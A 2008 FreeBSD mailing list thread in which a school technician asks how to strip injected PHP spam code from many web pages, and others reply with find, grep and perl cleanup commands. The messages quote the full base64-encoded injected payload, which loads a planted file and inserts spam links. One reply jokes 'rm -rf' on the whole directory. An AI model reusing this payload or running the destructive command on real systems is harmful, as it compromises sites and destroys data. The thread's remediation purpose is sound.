RE: Mass find/replace...
Arse - I spoke too soon. Anyone know any perl to remove blank lines???! i don't know perl but grep -v ^$ will remove all empty lines ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Friday 05 December 2008 11:19:09 Marc Coyles wrote: > > All done n' dusted now - thanks very much for everyone's input...! > > Have noted everything down in the back of my copy of "Absolute > > FreeBSD 2nd Edition" (which has inherited quite a few additional > > pages since I bought it). > > > > Now that that's done, I can start to wander thru logs and find > > who/how... > > > > Cheers! > > Marc > > Arse - I spoke too soon. > > Anyone know any perl to remove blank lines???! > It's left a blank line at top of each PHP file that it performed the action > on, which has broken things a touch... 's/^(.*?)\r?\n\r?\n/$1\n/s' should only replace the first empty line it finds in a file and accounts for windows line endings. Try it out on one file first: perl -pi.bak 's/^(.*?)\r?\n\r?\n/$1\n/s' filename.php -- Mel Problem with today's modular software: they start with the modules and never get to the software part. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> All done n' dusted now - thanks very much for everyone's input...! > Have noted everything down in the back of my copy of "Absolute > FreeBSD 2nd Edition" (which has inherited quite a few additional > pages since I bought it). > > Now that that's done, I can start to wander thru logs and find > who/how... > > Cheers! > Marc > Arse - I spoke too soon. Anyone know any perl to remove blank lines???! It's left a blank line at top of each PHP file that it performed the action on, which has broken things a touch... marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
All done n' dusted now - thanks very much for everyone's input...! Have noted everything down in the back of my copy of "Absolute FreeBSD 2nd Edition" (which has inherited quite a few additional pages since I bought it). Now that that's done, I can start to wander thru logs and find who/how... Cheers! Marc ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
Peter Boosten wrote:
| Marc Coyles wrote:
|> I'm presuming it'd be:
|>
|> Find /home/horbury -type f -name "*.bak" -exec \
|> Rm *.bak
|>
|
| find /home/horbury -name "*.bak" -exec rm {} \;
|
find /home/horbury -type f -name '*.bak' -delete
'delete' is a find primitive -- no need to exec any other processes.
Cheers,
Matthew
- --
Dr Matthew J Seaman MA, D.Phil. Flat 3
~ 7 Priory Courtyard
PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate
~ Kent, CT11 9PW, UK
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.9 (FreeBSD)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEAREDAAYFAkk4+OAACgkQ3jDkPpsZ+VbPwACfUrggUN1yIPqkq3pgCyy6fFzH
sncAn2WW0XD9l9NgNtK4T2IiMqoyxY6f
=1CX6
-END PGP SIGNATURE-
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Friday 05 December 2008 10:17:46 Marc Coyles wrote:
> > + not \; or you will fork on every result.
> >
> > Additionally, is this injected code one long string or broken down
> > by the
> > mailer? Grep isn't the best way to deal with it. It's pretty easy
> > to correct
> > with perl, bit trickier if it's multiline, still not too hard:
> >
> > find /home/horbury -type f -exec \
> > perl -pi.bak -e 's,<\? /\*\*/eval\(base64_decode\(.*?\?>,,s' {} +
>
> Sadly that didn't work. It created .bak files for everything within
> /home/Horbury recursively, but didn't make any changes - the base64_decode
> is till present.
>
> Additional point to note: this only needs performing on .php files, not all
> files...
>
> Would I be correct in guessing it's because the string for perl to search
> for omits a space?
Nope.
> IE: within the files, it's as follows:
>
Cause in your original mail I didn't catch the ,,s'
> Whereas the perl appears to be looking for:
>
>
> Also... how to delete all files ending in .bak recursively? *grin*
>
> I'm presuming it'd be:
>
> Find /home/horbury -type f -name "*.bak" -exec \
find /home/horbury -name '*.bak' -delete
--
Mel
Problem with today's modular software: they start with the modules
and never get to the software part.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Marc Coyles wrote:
>
> I'm presuming it'd be:
>
> Find /home/horbury -type f -name "*.bak" -exec \
> Rm *.bak
>
find /home/horbury -name "*.bak" -exec rm {} \;
Peter
--
http://www.boosten.org
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> + not \; or you will fork on every result.
>
> Additionally, is this injected code one long string or broken down
> by the
> mailer? Grep isn't the best way to deal with it. It's pretty easy
> to correct
> with perl, bit trickier if it's multiline, still not too hard:
>
> find /home/horbury -type f -exec \
> perl -pi.bak -e 's,<\? /\*\*/eval\(base64_decode\(.*?\?>,,s' {} +
>
Sadly that didn't work. It created .bak files for everything within
/home/Horbury recursively, but didn't make any changes - the base64_decode is
till present.
Additional point to note: this only needs performing on .php files, not all
files...
Would I be correct in guessing it's because the string for perl to search for
omits a space?
IE: within the files, it's as follows:
Whereas the perl appears to be looking for:
Also... how to delete all files ending in .bak recursively? *grin*
I'm presuming it'd be:
Find /home/horbury -type f -name "*.bak" -exec \
Rm *.bak
???
Ta!
Marc
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
RE: Mass find/replace...
> + not \; or you will fork on every result.
>
> Additionally, is this injected code one long string or broken down
> by the
> mailer? Grep isn't the best way to deal with it. It's pretty easy
> to correct
> with perl, bit trickier if it's multiline, still not too hard:
>
> find /home/horbury -type f -exec \
> perl -pi.bak -e 's,<\?/\*\*/eval\(base64_decode\(.*?\?>,,s'
> {} +
>
Hi Mel...
S'One long singleline string broken down by the mailer...
Have tried doing a find and replace using perl, initially just to replace the
string, leaving an empty base64_decode(), however, one of the ICT Teachers has
created paths with spaces in, which seemed to throw off the perl I was using...
will give yours a try later today *fingers crossed*...
If worst comes to worst I can restore from backups, it'll just mean students
lose a few days of work that they'd submitted thru Moodle (I've been off for a
day or three, and this appears to have happened on the first day of my absence)
Ta fer the helpful suggestions thus far!
Marc A Coyles - Horbury School ICT Support Team
Mbl: 07850 518106
Land: 01924 282740 ext 730
Helpdesk: 01924 282740 ext 2000
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Thursday 04 December 2008 13:58:20 Julien Cigar wrote:
> the following should work :
> $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode'
> or :
> $ find /home/horbury -type f -exec grep 'base64_decode' {} \;
+ not \; or you will fork on every result.
Additionally, is this injected code one long string or broken down by the
mailer? Grep isn't the best way to deal with it. It's pretty easy to correct
with perl, bit trickier if it's multiline, still not too hard:
find /home/horbury -type f -exec \
perl -pi.bak -e 's,<\?/\*\*/eval\(base64_decode\(.*?\?>,,s' {} +
The originals will end up as filename.php.bak.
--
Mel
Problem with today's modular software: they start with the modules
and never get to the software part.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Or just: grep -r base64_decode /home/Horbury rm -rf /home/Horbury and then - write the webpage code properly :) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
On Thu, Dec 04, 2008 at 12:52:02PM +, Vincent Hoffman typed: > Marc Coyles wrote: > > > > I need to do a find / replace throughout the entire of the > > /home/horbury/public_html directory... > > I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' > > to get a list of the files that require the operation performing, but it > > comes up with an error (xargs: unterminated quote) after a few > > results... > > > try using > > find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode > (not certain it'll fix it but good practice anyway) Or just: grep -r base64_decode /home/Horbury Ruben ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
the following should work :
$ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode'
or :
$ find /home/horbury -type f -exec grep 'base64_decode' {} \;
On Thu, 2008-12-04 at 12:14 +, Marc Coyles wrote:
> Never had to do this so not sure where to start. Have googled and found
> some solutions but they don't particularly work (see below)...
>
> Someone has managed to inject php code into a PILE of php pages on my
> webserver...
>
> " /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
> ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp
> c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv
> ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv
> aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1
> YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp
> bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn
> KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp
> KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk
> UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB
> MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw
> NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS
> MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw
> ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5
> MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2
> OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE
> QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4
> ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2
> QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4
> NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
> ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk
> UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB
> N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2
> NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p
> ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC
> N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF
> MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
> ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz
> MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF
> MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0
> dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i
> aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt
> RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6
> ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0
> Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty
> ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk
> UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku
> JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp
> O319fQ==')); ?>"
>
> This basically brings up a pile of spam links.
>
> I need to do a find / replace throughout the entire of the
> /home/horbury/public_html directory...
> I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode'
> to get a list of the files that require the operation performing, but it
> comes up with an error (xargs: unterminated quote) after a few
> results...
>
> Any tips? Basically to find the above and remove it... otherwise I'll
> have to resort to doing it in Dreamweaver and reuploading, which is a
> major pita, or restoring from a backup (after working out when exactly
> this happened and how - I'm guessing thru a teacher's out of date
> wordpress install somewhere).
>
> Marc A Coyles - Horbury School ICT Support Team
> Mbl: 07850 518106
> Land: 01924 282740 ext 730
> Helpdesk: 01924 282740 ext 2000
>
>
>
>
> ___
> freebsd-questions@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-questions
> To unsubscribe, send any mail to "[EMAIL PROTECTED]"
--
Julien Cigar
Belgian Biodiversity Platform
http://www.biodiversity.be
Université Libre de Bruxelles (ULB)
Campus de la Plaine CP 257
Bâtiment NO, Bureau 4 N4 115C (Niveau 4)
Boulevard du Triomphe, entrée ULB 2
B-1050 Bruxelles
Mail: [EMAIL PROTECTED]
@biobel: http://biobel.biodiversity.be/person/show/471
Tel : 02 650 57 52
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Re: Mass find/replace...
Marc Coyles wrote:
> Never had to do this so not sure where to start. Have googled and found
> some solutions but they don't particularly work (see below)...
>
> Someone has managed to inject php code into a PILE of php pages on my
> webserver...
>
> " /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
> ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp
> c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv
> ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv
> aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1
> YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp
> bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn
> KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp
> KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk
> UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB
> MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw
> NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS
> MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw
> ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5
> MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2
> OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE
> QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4
> ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2
> QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4
> NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
> ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk
> UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB
> N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2
> NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p
> ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC
> N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF
> MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
> ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz
> MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF
> MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0
> dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i
> aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt
> RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6
> ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0
> Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty
> ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk
> UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku
> JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp
> O319fQ==')); ?>"
>
> This basically brings up a pile of spam links.
>
> I need to do a find / replace throughout the entire of the
> /home/horbury/public_html directory...
> I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode'
> to get a list of the files that require the operation performing, but it
> comes up with an error (xargs: unterminated quote) after a few
> results...
>
try using
find /home/Horbury/ -type f -print0| xargs -0 grep -l base64_decode
(not certain it'll fix it but good practice anyway)
Vince
> Any tips? Basically to find the above and remove it... otherwise I'll
> have to resort to doing it in Dreamweaver and reuploading, which is a
> major pita, or restoring from a backup (after working out when exactly
> this happened and how - I'm guessing thru a teacher's out of date
> wordpress install somewhere).
>
> Marc A Coyles - Horbury School ICT Support Team
> Mbl: 07850 518106
> Land: 01924 282740 ext 730
> Helpdesk: 01924 282740 ext 2000
>
>
>
>
> ___
> freebsd-questions@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-questions
> To unsubscribe, send any mail to "[EMAIL PROTECTED]"
>
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
Mass find/replace...
Never had to do this so not sure where to start. Have googled and found some solutions but they don't particularly work (see below)... Someone has managed to inject php code into a PILE of php pages on my webserver... "" This basically brings up a pile of spam links. I need to do a find / replace throughout the entire of the /home/horbury/public_html directory... I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' to get a list of the files that require the operation performing, but it comes up with an error (xargs: unterminated quote) after a few results... Any tips? Basically to find the above and remove it... otherwise I'll have to resort to doing it in Dreamweaver and reuploading, which is a major pita, or restoring from a backup (after working out when exactly this happened and how - I'm guessing thru a teacher's out of date wordpress install somewhere). Marc A Coyles - Horbury School ICT Support Team Mbl: 07850 518106 Land: 01924 282740 ext 730 Helpdesk: 01924 282740 ext 2000 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "[EMAIL PROTECTED]"
